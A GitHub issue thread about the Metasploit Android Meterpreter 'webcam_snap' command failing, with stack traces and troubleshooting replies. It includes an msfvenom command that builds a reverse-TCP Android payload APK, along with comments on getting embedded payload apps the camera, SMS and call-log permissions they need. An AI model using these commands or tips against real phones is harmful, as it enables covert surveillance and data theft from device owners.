### ISSUE TITLE
webcam_start: Operation failed: 1

### ISSUE THREAD

**Issue by gnu-like** [rapid7/metasploit-framework#12114]
## payload => android/meterpreter/reverse_tcp
``webcam_start: Operation failed: 1``
``[*] 	Running command webcam_snap -v false -i 2``
**I checked log:**
`meterpreter: webcam_start: Operation failed: 1`
`meterpreter: Call stack:`
`/opt/metasploit-framework/embedded/framework/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb:41:in `webcam_start'
``/opt/metasploit-framework/embedded/framework/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/webcam.rb:98:in `cmd_webcam_snap'``

**Comment by space-r7** [comment]
Is this the full call stack?

**Comment by gnu-like** [comment]
> Is this the full call stack?

``` 
[07/22/2019 23:04:32] [e(0)] meterpreter: webcam_start: Operation failed: 1
[07/22/2019 23:04:32] [d(0)] meterpreter: Call stack:
/opt/metasploit-framework/embedded/framework/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb:41:in `webcam_start'
/opt/metasploit-framework/embedded/framework/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/webcam.rb:98:in `cmd_webcam_snap'
/opt/metasploit-framework/embedded/framework/lib/rex/ui/text/dispatcher_shell.rb:523:in `run_command'
/opt/metasploit-framework/embedded/framework/lib/rex/post/meterpreter/ui/console.rb:105:in `run_command'
/opt/metasploit-framework/embedded/framework/lib/rex/ui/text/dispatcher_shell.rb:474:in `block in run_single'
/opt/metasploit-framework/embedded/framework/lib/rex/ui/text/dispatcher_shell.rb:468:in `each'
/opt/metasploit-framework/embedded/framework/lib/rex/ui/text/dispatcher_shell.rb:468:in `run_single'
/opt/metasploit-framework/embedded/framework/lib/rex/script/base.rb:117:in `block in run'
/opt/metasploit-framework/embedded/framework/lib/rex/script/base.rb:108:in `each'
/opt/metasploit-framework/embedded/framework/lib/rex/script/base.rb:108:in `run'
/opt/metasploit-framework/embedded/framework/lib/rex/script/base.rb:44:in `eval'
/opt/metasploit-framework/embedded/framework/lib/rex/script/base.rb:44:in `run'
/opt/metasploit-framework/embedded/framework/lib/msf/base/sessions/meterpreter.rb:316:in `execute_file'
/opt/metasploit-framework/embedded/framework/lib/msf/base/sessions/scriptable.rb:175:in `execute_script'
/opt/metasploit-framework/embedded/framework/lib/msf/base/sessions/meterpreter.rb:186:in `block (2 levels) in bootstrap'
/opt/metasploit-framework/embedded/framework/lib/msf/base/sessions/meterpreter.rb:182:in `each'
/opt/metasploit-framework/embedded/framework/lib/msf/base/sessions/meterpreter.rb:182:in `block in bootstrap'
/opt/metasploit-framework/embedded/framework/lib/msf/core/session_manager.rb:161:in `block (2 levels) in initialize_scheduler_threads'
/opt/metasploit-framework/embedded/framework/lib/msf/core/thread_manager.rb:106:in `block in spawn'
[07/22/2019 23:04:32] [e(0)] meterpreter: webcam_start: Operation failed: 1```

**Comment by TheDevKiller** [comment]
"I have this problem too" messages are useless but it has been posted 11 days ago and no solution so up

**Comment by space-r7** [comment]
I just tested the `webcam_snap` command, including the same one that failed for you, and I couldn't reproduce the problem. Please let me know what Android version you're targeting.

**Comment by TheDevKiller** [comment]
Me or the OP ? I'm targeting SuperiorOS which is a custom ROM, thé Daisy build on Android P

**Comment by timwr** [comment]
Is there anything in `adb logcat`?
You could also try generate the payload with the debug option:
`msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.12 LPORT=4444 AndroidMeterpreterDebug=true AndroidWakelock=true -o app.apk`

**Comment by gnu-like** [comment]
> I just tested the `webcam_snap` command, including the same one that failed for you, and I couldn't reproduce the problem. Please let me know what Android version you're targeting.

**OS: Android 4.2.2 - Linux 3.0.31 (armv7l)**

**Comment by gnu-like** [comment]
It seems camera service of android device crash ,we can reboot device or reset mediaserver with``` kill -9 `pidof mediaserver` ```

**Comment by roshanvijey** [comment]
Use command msfconsole instead of msfconsole -q

**Comment by RishabhRyber** [comment]
Even I faced same problem but allowing permissions to the payload app on the Android device solved my problem.
Remember: In newer versions of Android, permissions are denied by default and camera can be accessed only when the app is open(even background isn't enough).

**Comment by hamzahdalj111** [comment]
why I can't call the Call stack: in linux 2.0 times

**Comment by iods2** [comment]
this happens because after embedding the apk with the payload, it will no longer ask for permissions on install instead it states that the app require no special permissions. and you have to set the permissions manually in order to get features like "dump_sms and webcam_snap" in the meterpreter session.
I tried almost all the fixes available on the internet and none of them seem to work, it seems nobody knows why payload embedded app stop asking for permissions on install

**Comment by Rutu83** [comment]
Well, I have modified the old payload source code and I've figured out that phones that have versions above 10 are required to open the application on their main UI thread in order to do certain tasks such as opening the camera as well as recording the mic, however, some of the function still working dump sms and call log, etc. So, we can't access these resources from background service. On the other side, I am still working on it.
